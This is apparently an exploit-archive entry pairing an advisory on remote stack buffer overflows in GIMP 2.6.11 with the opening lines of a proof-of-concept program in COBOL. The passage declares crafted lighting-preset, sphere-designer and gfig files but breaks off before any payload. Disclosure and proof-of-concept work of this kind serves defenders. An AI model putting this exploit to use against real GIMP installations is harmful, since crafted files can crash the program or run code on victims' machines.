source: https://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150* FOR THE 4TH OVERFLOW, SEE BELOW.